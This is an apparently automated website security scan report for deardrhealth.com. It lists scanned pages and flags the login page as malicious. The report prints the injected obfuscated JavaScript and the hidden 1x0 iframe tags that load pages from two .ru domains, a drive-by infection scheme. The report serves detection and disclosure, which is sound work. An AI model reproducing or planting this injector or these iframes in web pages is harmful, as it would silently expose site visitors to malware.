Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=deardrhealth.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.deardrhealth.com/ | 200 OK Content-Length: 28944 Content-Type: text/html | clean |
http://www.deardrhealth.com/js/validation.js | 200 OK Content-Length: 36351 Content-Type: application/x-javascript | clean |
http://www.deardrhealth.com/js/jquery.min.js?ver=2.7.1 | 200 OK Content-Length: 57254 Content-Type: application/x-javascript | clean |
http://www.deardrhealth.com/js/carousel.js | 200 OK Content-Length: 3668 Content-Type: application/x-javascript | clean |
http://www.deardrhealth.com/js/j4d.js | 200 OK Content-Length: 2478 Content-Type: application/x-javascript | clean |
http://www.deardrhealth.com/js/prettify.js | 200 OK Content-Length: 15269 Content-Type: application/x-javascript | clean |
http://www.deardrhealth.com/js/easySlider1.5.js | 200 OK Content-Length: 4423 Content-Type: application/x-javascript | clean |
http://www.deardrhealth.com/index.php | 200 OK Content-Length: 28973 Content-Type: text/html | clean |
http://www.deardrhealth.com/what-is-bsct.php | 200 OK Content-Length: 13249 Content-Type: text/html | clean |
http://www.deardrhealth.com/about.php | 200 OK Content-Length: 9607 Content-Type: text/html | clean |
http://www.deardrhealth.com/addlettersubmission.php | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Mon, 19 Jan 2015 15:49:30 GMT Pragma: no-cache Location: login.php?act=session_expired&backurl=http%3A%2F%2Fwww.deardrhealth.com%2Faddlettersubmission.php Server: Apache/2.2 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: X-Mapping-elbhlnpj=AC0BF39E85B44AD51E95FBC9A7ECD922; path=/ Set-Cookie: PHPSESSID=dn8vqtptclvm77t4j0kkksm773; path=/ | clean |
http://www.deardrhealth.com/login.php?act=session_expired&backurl=http%3a%2f%2fwww.deardrhealth.com%2faddlettersubmission.php | 200 OK Content-Length: 10629 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
a=new Array('<','s','c','r','i','p','t','>',' ','v','a','r',' ','S','t','r','=','"','g','i','n','h','e','i','g','h','t','=',"'",'0',"'",' ','t','i','t','l','e','=',"'",'D','Y','v','y','n','E','X','U','Z','e',"'",' ','b','o','r','d','e','r','=',"'",'0',"'",' ','w','i','d','t','h','=',"'",'1',"'",' ','f','r','a','m','e','b','o','r','d','e','r','=',"'",'0',"'",' ','h','e','i','g','h','t','=',"'",'0',"'",' ','s','c','r','o','l','l','i','n','g','=',"'",'n','o',"'",'>','<','/','i','f','r', ',' ',' ',' ','d','o','c','u','m','e','n','t','.','w','r','i','t','e','(','S','t','r','.','s','u','b','s','t','r','i','n','g','(','1','0','6',',','2','1','3',')',',','S','t','r','.','s','u','b','s','t','r','i','n','g','(','0',',','1','0','6',')',')',' ','<','/','s','c','r','i','p','t','>');document.write(a.join(''))
Antivirus reports:
Hidden iFrame found. size: 1x0 src: http://lscab.ru/templates/lscab/kx/index.php?out=1331381254
<iframe name="sagutexyne" src="http://lscab.ru/templates/lscab/kx/index.php?out=1331381254" marginwidth="1" marginheight="0" title="dyvynexuze" border="0" width="1" frameborder="0" height="0" scrolling="no">
Hidden iFrame found. The same iFrame was found in 12 websites. size: 1x0 src: http://sitevalley.ru/kx/index.php?out=1331606723
<iframe name="sagutexyne" src="http://sitevalley.ru/kx/index.php?out=1331606723" marginwidth="1" marginheight="0" title="dyvynexuze" border="0" width="1" frameborder="0" height="0" scrolling="no">
http://www.deardrhealth.com/product.php | 200 OK Content-Length: 13085 Content-Type: text/html | clean |
http://www.deardrhealth.com/testimonials.php | 200 OK Content-Length: 15823 Content-Type: text/html | clean |
http://www.deardrhealth.com/contactus.php | 200 OK Content-Length: 12268 Content-Type: text/html | clean |
http://api.recaptcha.net/challenge?k=6LfkMAcAAAAAACEeJYZzGiiIqrf1VoGHrm74EDWu | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, no-store, max-age=0, must-revalidate Connection: close Date: Mon, 19 Jan 2015 15:49:40 GMT Pragma: no-cache Accept-Ranges: none Location: http://www.google.com/recaptcha/api/challenge?k=6LfkMAcAAAAAACEeJYZzGiiIqrf1VoGHrm74EDWu Server: GSE Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Fri, 01 Jan 1990 00:00:00 GMT Alternate-Protocol: 80:quic,p=0.02 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block | clean |
http://www.google.com/recaptcha/api/challenge?k=6lfkmacaaaaaaceejyzzgiiiqrf1voghrm74edwu | 200 OK Content-Length: 67 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: deardrhealth.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: deardrhealth.com
Referer: http://www.google.com/search?q=deardrhealth.com
Result:
The result is similar to the first query. There are no suspicious redirects found.